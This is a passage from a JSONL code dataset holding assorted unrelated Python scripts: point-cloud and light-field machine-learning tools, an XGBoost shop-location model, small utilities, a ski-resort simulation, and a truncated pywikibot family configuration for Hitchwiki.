filename.endswith('.points'):\n fid.write(os.path.join(curr_folder, filename) + '\\n')\n\n # write the transformation matrix\n mat = '0 0 1 1 0 0 0 1 0'\n mat_name = os.path.join(curr_folder, 'mat.txt')\n with open(mat_name, 'w') as fid:\n fid.write(mat)\n\n # run transform points\n cmd = '%s --filenames %s --output_path %s --mat %s' % \\\n (transform, filelist_name, output_path, mat_name)\n print(cmd)\n os.system(cmd)\n os.remove(filelist_name)\n os.remove(mat_name)\n\n\ndef generate_points_filelist():\n points_folder = os.path.join(root_folder, 'ModelNet40.points')\n\n for folder in ['train', 'test']:\n train = folder == 'train'\n filelist, idx = get_filelist(points_folder, train=train, suffix='points')\n prefix = 'm40_' + folder\n filename = os.path.join(root_folder, '%s_points_list.txt' % prefix)\n print('Save to %s' % filename)\n with open(filename, 'w') as fid:\n for i in range(len(filelist)):\n fid.write('%s %d\\n' % (filelist[i], idx[i]))\n\n\ndef generate_points_filelist_ratios():\n ratios = [0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1.0]\n points_folder = os.path.join(root_folder, 'ModelNet40.points.y')\n\n for folder in ['train', 'test']:\n train = folder == 'train'\n for ratio in ratios:\n if train == False and ratio < 1:\n continue\n prefix = 'm40_y_%.02f_%s' % (ratio, folder)\n filename = os.path.join(root_folder, '%s_points_list.txt' % prefix)\n filelist, idx = get_filelist(points_folder, train=train,\n suffix='points', ratio=ratio)\n print('Save to %s' % filename)\n with open(filename, 'w') as fid:\n for i in range(len(filelist)):\n fid.write('%s %d\\n' % (filelist[i], idx[i]))\n\n\nif __name__ == '__main__':\n eval('%s()' % args.run)\n","sub_path":"pytorch/projects/tools/modelnet.py","file_name":"modelnet.py","file_ext":"py","file_size_in_byte":8272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"516096087","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nimport xgboost as xgb\nfrom datetime import datetime\nfrom dateutil.parser import parse\nfrom datetime import date\nfrom datetime import time\nimport math\n\npath = 'data/'\ndf = pd.read_csv(path + u'ccf_first_round_user_shop_behavior_train.csv')\nshops = pd.read_csv(path + u'ccf_first_round_shop_info_train.csv')\ntest = pd.read_csv(path + u'evaluation_public.csv')\ndf = pd.merge(df, shops[['shop_id', 'mall_id']], how='left', on='shop_id')\ndf['label'] = 1\ntrain = pd.concat([df, test])\nmall_list = pd.read_csv('data/malls.csv')\nmall_list = list(mall_list['0'])\nresult = pd.DataFrame()\nmall_num = 0\nfor mall in mall_list:\n print(mall_num)\n print(mall)\n train1 = train[train.mall_id == mall].reset_index(drop=True)\n shop = shops[shops.mall_id == mall].reset_index(drop=True)\n l = []\n wifi_dict = {}\n for index, row in train1.iterrows():\n r = {}\n wifi_list = [wifi.split('|') for wifi in row['wifi_infos'].split(';')]\n for i in wifi_list:\n r[i[0]] = int(i[1])\n if i[0] not in wifi_dict:\n wifi_dict[i[0]] = 1\n else:\n wifi_dict[i[0]] += 1\n l.append(r)\n delate_wifi = []\n for i in wifi_dict:\n if wifi_dict[i] < 20:\n delate_wifi.append(i)\n m = []\n for row in l:\n new = {}\n for n in row.keys():\n if n not in delate_wifi:\n new[n] = row[n]\n m.append(new)\n train1 = pd.concat([train1, pd.DataFrame(m)], axis=1)\n list1 = list(train1[train1.shop_id.notnull()].dropna(axis=1, how='all').columns)\n list2 = list(train1[train1.shop_id.isnull()].dropna(axis=1, how='all').columns)\n intersection = list(set(list1).intersection(set(list2)))\n intersection.extend(['shop_id', 'row_id'])\n train1 = train1[intersection]\n\n shop_location = train1[['longitude', 'latitude', 'shop_id']]\n shop_location = shop_location[shop_location.shop_id.notnull()].groupby('shop_id').agg('mean').reset_index()\n shop_location.rename(columns={'longitude': 'r_longitude', 'latitude': 'r_latitude'}, inplace=True)\n shop = shop.merge(shop_location, on='shop_id', how='left')\n from math import radians, cos, sin, asin, sqrt\n\n\n def haversine(lon1, lat1, lon2, lat2):\n \"\"\" \n Calculate the great circle distance between two points \n on the earth (specified in decimal degrees) \n \"\"\"\n\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine公式 \n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371\n return c * r * 1000\n\n\n shop_info_1 = shop[['mall_id', 'longitude', 'latitude']] # 加mall经纬度\n shop_info_1 = shop_info_1.groupby(['mall_id']).agg('mean').reset_index()\n shop_info_1.rename(columns={'longitude': 'mall_longitude', 'latitude': 'mall_latitude'}, inplace=True)\n shop = shop.merge(shop_info_1, on='mall_id', how='left')\n shop['s_m_distance'] = list(\n map(lambda x1, y1, x2, y2: haversine(x1, y1, x2, y2), shop['longitude'], shop['latitude'],\n shop['mall_longitude'], shop['mall_latitude']))\n shop = pd.concat([shop, pd.get_dummies(shop['category_id'])], axis=1) #\n\n train1['time_stamp'] = train1['time_stamp'].apply(parse)\n train1['date'] = train1['time_stamp'].apply(datetime.date)\n train1['time'] = train1['time_stamp'].apply(datetime.time)\n train1['day_of_week'] = train1.date.apply(lambda x: date.weekday(x) + 1)\n train1['is_weekend'] = train1.day_of_week.apply(lambda x: 1 if x in (6, 7) else 0)\n\n\n def get_hour(t):\n h, m, s = t.split(':')\n return h\n\n\n train1['hour'] = train1['time'].apply(str).apply(get_hour).astype('int')\n\n\n def get_frame(t):\n if t < 11:\n f = 'f_1'\n elif t < 14:\n f = 'f_2'\n elif t < 18:\n f = 'f_3'\n else:\n f = 'f_4'\n return f\n\n\n train1['time_frame'] = train1['hour'].apply(get_frame)\n train1 = pd.concat([train1, pd.get_dummies(train1['time_frame'])], axis=1)\n train1.drop(['time'], axis=1, inplace=True)\n\n\n def get_day(t):\n y, m, d = t.split('-')\n return d\n\n\n train1['day'] = train1['date'].apply(str).apply(get_day).astype('int')\n train1.drop(['date'], axis=1, inplace=True)\n train1.drop(['time_stamp'], axis=1, inplace=True)\n # train_data\n df_train = train1[train1.shop_id.notnull()]\n df_test = train1[train1.shop_id.isnull()].reset_index(drop=True)\n df_train = df_train.reset_index(drop=True)\n df_train = df_train.merge(shop, on='mall_id', how='left')\n df_train['u_s_distance'] = list(\n map(lambda x1, y1, x2, y2: haversine(x1, y1, x2, y2), df_train['longitude_x'], df_train['latitude_x'],\n df_train['longitude_y'], df_train['latitude_y']))\n df_train['u_r_distance'] = list(\n map(lambda x1, y1, x2, y2: haversine(x1, y1, x2, y2), df_train['longitude_x'], df_train['latitude_x'],\n df_train['r_longitude'], df_train['r_latitude']))\n df_train['label'] = list(map(lambda x, y: 1 if (x == y) else 0, df_train['shop_id_x'], df_train['shop_id_y']))\n df_train.drop(['shop_id_x'], axis=1, inplace=True)\n df_train.rename(columns={'shop_id_y': 'shop_id'}, inplace=True)\n df_train = pd.concat([df_train, pd.get_dummies(df_train['shop_id'])], axis=1)\n df_train_neg = df_train[df_train.label == 0]\n df_train_posi = df_train[df_train.label == 1]\n df_train = df_train_posi.append(df_train_neg.groupby('shop_id').apply(\n lambda t: t.sample(int(len(t) * 0.04), axis=0, random_state=1))).reset_index(drop=True)\n\n # 1st train \n params = {\n 'objective': 'binary:logistic',\n 'eta': 0.1,\n 'max_depth': 7,\n 'eval_metric': 'logloss',\n 'seed': 0,\n 'missing': -999,\n 'silent': 1\n }\n feature = [x for x in df_train.columns if\n x not in ['user_id', 'category_id', 'time_frame', 'hour', 'u_s_distance', 'day', 'idx', 'label',\n 'shop_id', 'row_id', 'time_stamp', 'mall_id', 'wifi_infos', 'shop_id', 'mall_latitude',\n 'mall_longitude']]\n xgbtrain = xgb.DMatrix(df_train[feature], df_train['label'])\n # xgbtest = xgb.DMatrix(df_test[feature])\n watchlist = [(xgbtrain, 'train')]\n num_rounds = 500\n model = xgb.train(params, xgbtrain, num_rounds, watchlist, early_stopping_rounds=50)\n\n\n def predict(row):\n xgbtest = xgb.DMatrix(row[feature])\n row['pre_label'] = model.predict(xgbtest)\n return row\n\n\n # xgbtest = xgb.DMatrix(df_train_neg[feature])\n # df_train_neg['pre_label']=model.predict(xgbtest)\n df_train_neg = df_train_neg.groupby('shop_id').apply(predict)\n df_train_neg = df_train_neg[df_train_neg.pre_label > 0.3]\n df_train_neg_1 = df_train_neg[df_train_neg.pre_label > 0.5]\n df_train_neg_2 = df_train_neg[df_train_neg.pre_label > 0.95]\n df_train_posi = df_train_posi.groupby('shop_id').apply(predict)\n df_train_posi = df_train_posi[df_train_posi.pre_label < 0.9]\n # 2nd train \n params = {\n 'objective': 'binary:logistic',\n 'eta': 0.1,\n 'max_depth': 9,\n 'eval_metric': 'auc',\n 'seed': 0, ###\n 'missing': -999,\n 'silent': 1,\n 'subsample': 0.7, #\n 'scale_pos_weight': 4\n }\n df_train_again = pd.concat([df_train, df_train_neg, df_train_posi, df_train_neg_1, df_train_neg_2], axis=0).sample(\n frac=1).reset_index(drop=True)\n xgbtrain = xgb.DMatrix(df_train_again[feature], df_train_again['label'])\n # xgbval = xgb.DMatrix(df_train_val[feature],df_train_val['label'])\n watchlist = [(xgbtrain, 'train')]\n num_rounds = 400\n model_again = xgb.train(params, xgbtrain, num_rounds, watchlist, early_stopping_rounds=50)\n\n # validation\n df_test = df_test.merge(shop, on='mall_id', how='left')\n df_test['u_s_distance'] = list(\n map(lambda x1, y1, x2, y2: haversine(x1, y1, x2, y2), df_test['longitude_x'], df_test['latitude_x'],\n df_test['longitude_y'], df_test['latitude_y']))\n df_test['u_r_distance'] = list(\n map(lambda x1, y1, x2, y2: haversine(x1, y1, x2, y2), df_test['longitude_x'], df_test['latitude_x'],\n df_test['r_longitude'], df_test['r_latitude']))\n df_test.drop(['shop_id_x'], axis=1, inplace=True)\n df_test.rename(columns={'shop_id_y': 'shop_id'}, inplace=True)\n df_test = pd.concat([df_test, pd.get_dummies(df_test['shop_id'])], axis=1)\n\n\n def predict_again(row):\n xgbtest = xgb.DMatrix(row[feature])\n row['label'] = model_again.predict(xgbtest)\n return row\n\n\n df_test = df_test.groupby('shop_id').apply(predict_again)\n r = df_test[['row_id', 'shop_id', 'label']]\n r = r.groupby('row_id').apply(lambda t: t[t.label == t.label.max()]).reset_index(drop=True)\n r.drop(['label'], axis=1, inplace=True)\n result = pd.concat([result, r])\n result['row_id'] = result['row_id'].astype('int')\n result.to_csv(path + 'result_negative_mining.csv', index=False)\n mall_num += 1\n","sub_path":"binary_wifi_negative_mining_copy.py","file_name":"binary_wifi_negative_mining_copy.py","file_ext":"py","file_size_in_byte":9186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"267327592","text":"# -*- coding: utf-8 -*-\n\nenum_dict = {}\n\ndef enum(enum_name, val=None, val_name=None, desc=None):\n \n if not enum_dict.has_key(enum_name):\n enum_dict[enum_name] = Enum(enum_name)\n \n if str(val) and val_name and desc:\n enum_dict[enum_name].add(val, val_name, desc)\n \n return enum_dict[enum_name]\n\nclass Enum(object):\n def __init__(self, enum_name):\n self.values = []\n \n def add(self, val, val_name, desc):\n self.values.append(EnumValue(val, val_name, desc))\n\n def __getattr__(self, name):\n for v in self.values:\n if v.name == name: return v\n return None\n \n def value(self, val):\n for v in self.values:\n if v.value == str(val): return v\n return None\n\nclass EnumValue(object):\n def __init__(self, val, val_name, desc):\n self.value = str(val)\n self.name = val_name\n self.desc = desc\n \n def json_dict(self):\n result = {}\n result['id'] = self.value\n result['name'] = self.name\n result['desc'] = self.desc\n return result\n\n#the coding used in client views\nenum('bill_type', \"save_money\", '充值', \"充值\")\nenum('bill_type', \"fetch\", '提取', \"提取\")\nenum('bill_type', \"expense\", 'FB消费', \"FB消费\")\nenum('bill_type', \"transfer\", '转账', \"转账\")\nenum('bill_type', \"check\", '校对', \"校对\")\n\n","sub_path":"python/google_apps/deonwu84/mysite/fb_book/book/enum_code.py","file_name":"enum_code.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"261057960","text":"def today_in_the_history():\n import requests\n import json\n import time\n def func_standard(num):\n if(num<10):\n return \"0\"+str(num)\n else:\n return str(num)\n localtime = time.localtime(time.time())\n tm_mon = func_standard(localtime.tm_mon)\n tm_day = func_standard(localtime.tm_mday)\n today = tm_mon + tm_day\n response = requests.get(\"https://api.qzone.work/api/today.history?date=\" + today)\n result = json.loads(response.text)\n result2 = result[\"data\"][\"list\"]\n return result2\n\nresult2=today_in_the_history()\nfor i in range(len(result2)):\n text=result2[i][\"year\"]+\"年的今天,\"+result2[i][\"title\"]\n\n print(text)","sub_path":"today_in_the_history.py","file_name":"today_in_the_history.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"32242984","text":"import csv\nimport xml.etree.ElementTree as et\n\nwith open('data/2016년 세운산도 DB.txt', 'r') as f:\n with open('result.txt', 'w') as nf:\n reader = csv.DictReader(f, delimiter='\\t')\n for idx, row in enumerate(reader):\n print(row)\n\n # geometry\n tree = et.fromstring(row['geometry'])\n geometry_str = tree.find('./coordinates').text\n lon = geometry_str.split(',')[0]\n lat = geometry_str.split(',')[1]\n\n if idx == 0:\n nf.write(\n 'lon\\tlat\\tcategory\\tname\\tproducts\\tcontact\\taddr_building\\taddr_column\\taddr_floor\\taddr_room\\n'\n )\n\n nf.write(\n '%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n' %\n (lon, lat, row['분류'], row['업체명'], row['취급품목'], row['연락처'], row['상가명'], row['열'], row['층'], row['호수'])\n )\n","sub_path":"store_poi_parser.py","file_name":"store_poi_parser.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"502147726","text":"from sklearn import datasets\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn import metrics\r\nfrom sklearn.model_selection import cross_val_predict\r\nimport matplotlib.pyplot as plt\r\n\r\nimport numpy as np\r\nloaded_data=datasets.load_boston()\r\ndata_X=loaded_data.data\r\ndata_y=loaded_data.target\r\n\r\nX_train,X_test,y_train,y_test=train_test_split(data_X,data_y,test_size=0.2)#训练和测试集划分\r\nmodel=LinearRegression()\r\nmodel.fit(X_train,y_train)\r\nprint(model.coef_)\r\nprint(model.intercept_)\r\n\r\ny_pred=model.predict(X_test)\r\n\r\nprint(\"MSE is:\",metrics.mean_squared_error(y_test,y_pred))#LOSS=MSE均方差\r\n\r\n#10折交叉验证\r\npredicted=cross_val_predict(model,data_X,data_y,cv=10)\r\nprint(\"MSE is(with_cvp):\",metrics.mean_squared_error(data_y,predicted))\r\nplt.scatter(data_y,predicted,color='y',marker='o')\r\nplt.scatter(data_y,data_y,color='g',marker='+')\r\nplt.title('boston_house_price_prediction')\r\nplt.xlabel('real_price')\r\nplt.ylabel('predict_price')\r\nplt.show()\r\n\r\n","sub_path":"linear_regression/linear_regression/boston_sklearn.py","file_name":"boston_sklearn.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"499838030","text":"from ..timeseries import TimeSeries\nfrom ..custom_logging import raise_log, get_logger\nfrom typing import List\nfrom IPython import get_ipython\nfrom tqdm import tqdm, tqdm_notebook\n\nlogger = get_logger(__name__)\n\ndef retain_period_common_to_all(series: List[TimeSeries]) -> List[TimeSeries]:\n \"\"\"\n Trims all series in the provided list, if necessary, so that the return time series have\n the same time index (corresponding to largest duration common to all series).\n\n Raises an error if no such time index exists.\n :param series:\n :return:\n \"\"\"\n\n last_first = max(map(lambda s: s.start_time(), series))\n first_last = min(map(lambda s: s.end_time(), series))\n\n if last_first >= first_last:\n raise_log(ValueError('The provided time series must have nonzero overlap'), logger)\n\n return list(map(lambda s: s.slice(last_first, first_last), series))\n\n\ndef build_tqdm_iterator(iterable, verbose):\n \"\"\"\n Build an iterable, possibly using tqdm (either in notebook or regular mode)\n :param iterable:\n :param verbose:\n :return:\n \"\"\"\n\n def _isnotebook():\n try:\n shell = get_ipython().__class__.__name__\n if shell == 'ZMQInteractiveShell':\n return True # Jupyter notebook or qtconsole\n elif shell == 'TerminalInteractiveShell':\n return False # Terminal running IPython\n else:\n return False # Other type (?)\n except NameError:\n return False # Probably standard Python interpreter\n\n if verbose:\n if _isnotebook():\n iterator = tqdm_notebook(iterable)\n else:\n iterator = tqdm(iterable)\n else:\n iterator = iterable\n return iterator\n\n","sub_path":"u8timeseries/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"408148881","text":"#!/usr/bin/env python3\n\n\nimport numpy as np\nimport logging\nfrom math import pi, sin, cos\n\n# a sample for general alkyl group with methyls\n# tree | branch: [root,branch1,branch2,branch3]\n# or [root,branch1,branch2]\n# or [root,branch1]\n# or [leaf]\n# or leaf\n# 3-methylbutyl : backbone=[\"Ma\",[\"Mb\",[\"Mc\",[\"Md\",\"Me\"]]]]]\n# v1 and v2 must be given as a unit vector.\n\n\ndef alkyl(direction, destination, tree, dest=None):\n \"\"\"\n put a normal-alkyl group rooted at root toward cpos.\n \"\"\"\n logger = logging.getLogger()\n logger.debug(\" {0}\".format(tree))\n # logger.info(\" Put butyl at {0}\".format(molname))\n\n if not isinstance(tree, list):\n tree = [tree]\n\n # v2 is a vector from direction to the destination\n v2 = destination - direction\n v2 /= np.linalg.norm(v2)\n v2d = np.dot(direction, v2)\n while v2d > 0.999:\n # They are inline. It is not safe to determine the orientation.\n v2 = np.random.random(3)\n v2 /= np.linalg.norm(v2)\n v2d = np.dot(direction, v2)\n\n v2 -= v2d * direction\n v2 /= np.linalg.norm(v2)\n\n # v1 is the pivot\n v1 = direction\n\n v3 = np.cross(v1, v2) # the thild unit vector\n\n c = cos(120 * pi / 180)\n s = sin(120 * pi / 180)\n v4 = v2 * c + v3 * s # a branch vector\n v5 = v2 * c - v3 * s # another branch vector\n logger.debug(\" {0} -0.5\".format(np.dot(v2, v4)))\n logger.debug(\" {0} -0.5\".format(np.dot(v4, v5)))\n logger.debug(\" {0} -0.5\".format(np.dot(v5, v2)))\n\n c = cos(109.5 * pi / 180)\n s = sin(109.5 * pi / 180)\n v2 = -v1 * c + v2 * s\n v4 = -v1 * c + v4 * s\n v5 = -v1 * c + v5 * s\n logger.debug(\" {0} 1/3\".format(np.dot(v1, v2)))\n logger.debug(\" {0} 1/3\".format(np.dot(v1, v4)))\n logger.debug(\" {0} 1/3\".format(np.dot(v1, v5)))\n logger.debug(\" {0} 1\".format(np.dot(v2, v2)))\n logger.debug(\" {0} 1\".format(np.dot(v4, v4)))\n logger.debug(\" {0} 1\".format(np.dot(v5, v5)))\n\n #assert False\n atomname = tree[0]\n atoms = [(atomname, np.zeros(3))]\n for vec, topo in zip([v2, v4, v5], tree[1:]):\n atoms += alkyl(vec, destination - v1, topo)\n # untranslation\n atoms = [(atom[0], atom[1] + v1) for atom in atoms]\n\n return atoms\n\n\ndef test():\n logging.basicConfig(level=logging.DEBUG,\n format=\"%(asctime)s %(levelname)s %(message)s\")\n direction = np.array([1.0, 0.0, 0.0]) # must be a unit vector\n destination = np.array([10.0, 10.0, 0.0]) # All the branches direct to this point.\n atoms = alkyl(direction, destination, tree=[\"Ma\", [\"Mb\", \"Mf\", [\"Mc\", \"Me\", [\"Md\", [\"A\", [\"B\", [\"C\", [\"D\"]]]]]]]])\n # in yaplot format\n print(\"t 0 0 0 +\")\n print(\"t\", destination[0], destination[1], destination[2], \"@\")\n for atom in atoms:\n name, pos = atom\n print(\"t\", pos[0], pos[1], pos[2], name)\n\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"genice/alkyl.py","file_name":"alkyl.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"397873688","text":"'''\nCreated on May 9, 2016\n\n@author: itboy\n'''\nimport threading\n\nclass FileTask(threading.Thread):\n def __init__(self,begin,end,f):\n threading.Thread.__init__(self)\n self.begin = begin\n self.end = end\n self.f = f\n \n def run(self):\n for i in range(self.begin,self.end+1):\n self.f.write((str(i)*1000+\"\\r\\n\").encode())\n print(threading.current_thread(),\" \" , str(i))\n\ndef start():\n f = open('test.txt','wb')\n task1 = FileTask(1,100,f)\n task2 = FileTask(101,200,f)\n task1.start()\n task2.start()\n task1.join()\n task2.join()\n f.close()\n\nif __name__ == '__main__':\n start()\n\n","sub_path":"demos/std/threadingdemo/LockDemo.py","file_name":"LockDemo.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"317651477","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 1 12:38:35 2020\n\n@author: Dvyd\n\"\"\"\n\nimport simpy\nimport numpy as np\nimport random\nimport settings\nfrom esquiador_agrupat import esquiador_agrupat\n\nclass grup_esquiador_setup(object):\n def __init__(self, env):\n self.env = env\n self.action = env.process(self.run())\n \n def grup_esquiador_setup(env, num, telecadira, remuntador1, remuntador2, pista1, pista2, pista3, pista4):\n count = num\n #while (count < 5):\n num_esquiadors = int(settings.fdistribution_num_esquiadors())\n esqlist = []\n \n for i in range(num_esquiadors):\n esquiador = esquiador_agrupat(env)\n esq = esquiador.esquiador_agrupat(env, '%d-g%d-%d' % (settings.count, count, i+1), telecadira, remuntador1, remuntador2, pista1, pista2, pista3, pista4)\n settings.count += 1\n setattr(esquiador,'grup', count)\n env.process(esq)\n esqlist.append(esquiador)\n yield env.timeout(0.1)\n \n for j in esqlist:\n setattr(j, 'potPujar', 1)\n \n for j in esqlist:\n while (getattr(j, 'isReady') == 0):\n yield env.timeout(0.1)\n \n for j in esqlist:\n setattr(j, 'potBaixar', 1)\n","sub_path":"grup_esquiador_setup.py","file_name":"grup_esquiador_setup.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"283888750","text":"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as functional\nfrom model_utility import *\n\n\nclass Net(nn.Module): \n def __init__(self, opt): \n \n super(Net, self).__init__()\n\n an2 = opt.angular_out * opt.angular_out\n \n # disparity\n self.disp_estimator = nn.Sequential(\n nn.Conv2d(opt.num_source,16,kernel_size=7,stride=1,dilation=2,padding=6),\n nn.ReLU(inplace=True),\n nn.Conv2d(16,32,kernel_size=7,stride=1,dilation=2,padding=6),\n nn.ReLU(inplace=True),\n nn.Conv2d(32,64,kernel_size=5,stride=1,padding=2),\n nn.ReLU(inplace=True),\n nn.Conv2d(64,64,kernel_size=5,stride=1,padding=2),\n nn.ReLU(inplace=True),\n nn.Conv2d(64,an2,kernel_size=3,stride=1,padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(an2,an2,kernel_size=3,stride=1,padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(an2,an2,kernel_size=3,stride=1,padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(an2,an2,kernel_size=3,stride=1,padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(an2,an2,kernel_size=3,stride=1,padding=1),\n )\n \n # LF \n self.lf_conv0 = nn.Sequential(\n nn.Conv2d(in_channels=opt.num_source, out_channels=64, kernel_size=3, stride=1, padding=1),\n nn.ReLU(inplace=True),\n )\n self.lf_altblock = make_Altlayer(layer_num=opt.layer_num, an=opt.angular_out, ch=64)\n if opt.angular_out == 9:\n self.lf_res_conv = nn.Sequential(\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(5,3,3), stride=(4,1,1), padding=(0,1,1)),#81->20\n nn.ReLU(inplace=True),\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(5,3,3), stride=(3,1,1), padding=(0,1,1)), #20->6\n nn.ReLU(inplace=True),\n nn.Conv3d(in_channels=64, out_channels=81, kernel_size=(6,3,3), stride=(1,1,1), padding=(0,1,1)), #6-->1\n ) \n \n\n if opt.angular_out == 8:\n self.lf_res_conv = nn.Sequential(\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(4,3,3), stride=(4,1,1), padding=(0,1,1)),#64-->16\n nn.ReLU(inplace=True),\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(4,3,3), stride=(4,1,1), padding=(0,1,1)), #16-->4\n nn.ReLU(inplace=True),\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(4,3,3), stride=(1,1,1), padding=(0,1,1)),#4-->1\n )\n\n if opt.angular_out == 7:\n self.lf_res_conv = nn.Sequential(\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(5,3,3), stride=(4,1,1), padding=(0,1,1)),#49-->12\n nn.ReLU(inplace=True),\n nn.Conv3d(in_channels=64, out_channels=64, kernel_size=(4,3,3), stride=(4,1,1), padding=(0,1,1)), #12-->3\n nn.ReLU(inplace=True),\n nn.Conv3d(in_channels=64, out_channels=49, kernel_size=(3,3,3), stride=(1,1,1), padding=(0,1,1)),#3-->1\n ) \n \n \n def forward(self, ind_source, img_source, opt):\n \n an = opt.angular_out\n an2 = opt.angular_out * opt.angular_out\n \n # ind_source \n N,num_source,h,w = img_source.shape #[N,num_source,h,w]\n ind_source = torch.squeeze(ind_source) #[num_source] \n \n #################### disparity estimation ##############################\n disp_target = self.disp_estimator(img_source) #[N,an2,h,w]\n\n #################### intermediate LF ##############################\n warp_img_input = img_source.view(N*num_source,1,h,w).repeat(an2,1,1,1) #[N*an2*4,1,h,w]\n \n grid = []\n for k_t in range(0,an2):\n for k_s in range(0,num_source):\n ind_s = ind_source[k_s].type_as(img_source)\n ind_t = torch.arange(an2)[k_t].type_as(img_source)\n ind_s_h = torch.floor(ind_s/an)\n ind_s_w = ind_s % an\n ind_t_h = torch.floor(ind_t/an)\n ind_t_w = ind_t % an \n disp = disp_target[:,k_t,:,:]\n \n XX = torch.arange(0,w).view(1,1,w).expand(N,h,w).type_as(img_source) #[N,h,w]\n YY = torch.arange(0,h).view(1,h,1).expand(N,h,w).type_as(img_source) \n grid_w_t = XX + disp * (ind_t_w - ind_s_w)\n grid_h_t = YY + disp * (ind_t_h - ind_s_h)\n grid_w_t_norm = 2.0 * grid_w_t / (w-1) - 1.0\n grid_h_t_norm = 2.0 * grid_h_t / (h-1) - 1.0 \n grid_t = torch.stack((grid_w_t_norm, grid_h_t_norm),dim=3) #[N,h,w,2] \n grid.append(grid_t) \n grid = torch.cat(grid,0) #[N*an2*4,h,w,2]\n \n warped_img = functional.grid_sample(warp_img_input,grid).view(N,an2,num_source,h,w)\n\n ################# refine LF ###########################\n feat = self.lf_conv0(warped_img.view(N*an2,num_source,h,w)) #[N*an2,64,h,w]\n feat = self.lf_altblock(feat) #[N*an2,64,h,w]\n feat = torch.transpose(feat.view(N,an2,64,h,w),1,2) #[N,64,an2,h,w]\n res = self.lf_res_conv(feat) #[N,an2,1,h,w]\n \n lf = warped_img[:,:,0,:,:] + torch.squeeze(res,2) #[N,an2,h,w] \n \n return warped_img, disp_target, lf\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"20955346","text":"# -*- coding: utf-8 -*-\nimport family, config\n\n# www.hitchwiki.org \n\nclass Family(family.Family):\n def __init__(self):\n family.Family.__init__(self)\n self.name = 'hitchwiki'\n self.langs = {\n 'en': 'hitchwiki.org',\n 'es': 'hitchwiki.org',\n 'fr': 'hitchwiki.org',\n 'de': 'hitchwiki.org',\n 'ru': 'hitchwiki.org',\n 'fi': 'hitchwiki.org',\n 'pt': 'hitchwiki.org',\n 'bg': 'hitchwiki.org',\n 'zh': 'hitchwiki.org',\n 'pl': 'hitchwiki.org',\n 'tr': 'hitchwiki.org',\n 'nl': 'hitchwiki.org',\n 'ro': 'hitchwiki.org',\n 'he': 'hitchwiki.org',\n 'hr': 'hitchwiki.org',\n }\n self.namespaces[1] = {\n '_default': u'Talk',\n 'ar': u'نقاش',\n 'ca': u'Discussió',\n 'de': u'Diskussion',\n 'eo': u'Diskuto',\n 'es': u'Discusión',\n 'fi': u'Keskustelu',\n 'fr': u'Discuter',\n 'he': u'שיחה',\n 'hi': u'वार्ता',\n 'hu': u'Vita',\n 'it': u'Discussione',\n 'ja': u'ノート',\n 'ko': u'토론',\n 'nl': u'Overleg',\n 'pl': u'Dyskusja',\n 'pt': u'Discussão',\n 'ro': u'Discuţie',\n 'ru': u'Обсуждение',\n 'sv': u'Diskussion',\n 'bg': u'Беседа',\n 'tr': u'Tartışma',\n }\n self.namespaces[2] = {\n '_default': u'User',\n 'de': u'Benutzer',\n 'es': u'Usuario',\n 'fr': u'Utilisateur',\n 'fi': u'Käyttäjä',\n 'nl': u'Gebruiker',\n 'pl': u'Użytkownik',\n 'pt': u'Usuário',\n 'ro': u'Utilizator',\n 'ru': u'Участник',\n 'sv': u'Användare',\n 'bg': u'Потребител',\n 'tr': u'Kullanıcı',\n }\n\n self.namespaces[4] = {\n '_default': u'Hitchwiki',\n 'de' : u'Tramperwiki',\n 'es' : u'Autostopwiki',\n 'tr' : u'Otostopviki',\n 'fi' : u'Liftariwikiin',\n 'pl' : u'Autostopwiki',\n 'pt' : u'CaronaWiki',\n\n }\n self.namespaces[5] = {\n '_default': u'Hitchwiki talk',\n 'de' : u'Tramperwiki 